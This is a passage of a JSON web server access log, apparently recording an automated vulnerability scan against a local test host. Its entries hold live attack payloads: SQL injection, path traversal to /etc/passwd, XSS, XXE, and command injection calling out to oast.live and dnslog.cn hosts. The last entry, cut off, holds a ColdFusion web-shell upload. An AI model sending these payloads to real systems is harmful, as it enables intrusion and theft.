"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b' HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.261","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.314","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/pma/server_import.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.317","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.423","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.346","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"{\x22content\x22: \x22include:\x5Cn remote: http://127.0.0.1:9100/test.yml\x22}\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.259","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.424","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /os/mxperson HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.298","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/coverage.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.441","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.328","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /zabbix/index_sso.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.309","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/server_import.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.244","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cgi-bin/mainfunction.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.362","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webmodule-ee/login.seam HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.329","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.298","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /xml/User/User.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.298","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /meaweb/os/mxperson HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.281","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /adm_program/system/redirect.php?url=javascript://%250aalert(document.domain) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.386","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login?next=\x5C\x5C\x5Cexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.339","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dashboardUser HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.345","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/phpMyAdmin/server_import.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.264","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"{\x22objs\x22: [{\x22FID\x22: \x22init\x22}], \x22SID\x22: \x22|wget http://c9oms3gsmpve1ijt0mc01uf3i5dstxfyc.oast.live|\x22, \x22browser\x22: \x22gecko_linux\x22, \x22backend_version\x22: -1, \x22loc\x22: \x22\x22, \x22_cookie\x22: null, \x22wdebug\x22: 0, \x22RID\x22: \x221629210675639_0.5000855117488202\x22, \x22current_uuid\x22: \x22\x22, \x22ipv6\x22: true}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /var HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.305","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index_sso.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.381","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.277","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.386","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/login.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"proId=1'&addToCart=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /action.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.385","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pandora_console/ajax.php?page=../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.336","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?28fHqXCRBDIrTgrABfWexMfSaSw=9 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.440","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"cache.example.com"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.631","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_vti_inf.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.650","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php/Home/login/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.839","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'` HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.311","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"imgSrc=a","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Gemfile.lock HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.493","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.354","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_ID\x22\x0D\x0A\x0D\x0A1\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_FileUploadDir\x22\x0D\x0A\x0D\x0A/wp-content/uploads/simple-file-list/\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Timestamp\x22\x0D\x0A\x0D\x0A1587258885\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Token\x22\x0D\x0A\x0D\x0Aba288252629a5399759b6fde1e205bc2\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22nuclei.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.328","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /css_parser.php?css=css_parser.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.410","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /xmlpserver/convert?xml=<%3fxml+version%3d\x221.0\x22+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?28fHqXCRBDIrTgrABfWexMfSaSw=9 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.277","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /adfs/ls/idpinitiatedsignon.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.330","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/pr.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.246","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.442","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.440","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /webtools/control/SOAPService HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"3.172","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.346","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.348","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_vti_pvt/service.cnf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.307","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"sondata[ip]=a|curl c9oms3gsmpve1ijt0mc0ycfywr67yp6d6.oast.live&jsondata[type]=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /php/ping.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Forms/rpAuth_1?id=
HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.325","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"imgSrc=\x0D\x0A\x0D\x0A\x0D\x0A
\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A
Command:value=\x22#form.cmd#\x22>
Options: value=\x22#form.opts#\x22>
Timeout: value=\x22#form.timeout#\x22\x0D\x0A value=\x225\x22>
\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A
\x0D\x0A#HTMLCodeFormat(myVar)#\x0D\x0A
\x0D\x0A
